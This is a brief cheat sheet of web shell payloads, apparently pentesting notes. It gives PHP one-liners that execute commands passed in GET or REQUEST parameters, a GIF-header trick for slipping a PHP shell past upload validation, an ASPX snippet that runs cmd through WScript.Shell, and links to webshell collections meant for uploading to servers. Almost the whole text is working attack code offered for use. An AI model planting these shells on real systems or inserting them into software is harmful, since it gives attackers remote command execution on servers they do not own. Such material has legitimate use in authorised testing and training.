# Web Shells

# PHP

# Interactive PHP web shell

P0wnyShell

# Simple PHP RCE

<?php
system($_GET['cmd']);
?>

Using REQUEST we can use a POST. (POST use less bad characters!)

<?php system($_REQUEST['cmd']); ?>

Bypass file validation with GIF header:

GIF8;<?php system($_REQUEST['cmd']); ?>

# ASPX

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>

# Collections

A collection of webshells to use/upload to webservers:
https://github.com/tennc/webshell
https://github.com/xl7dev/WebShell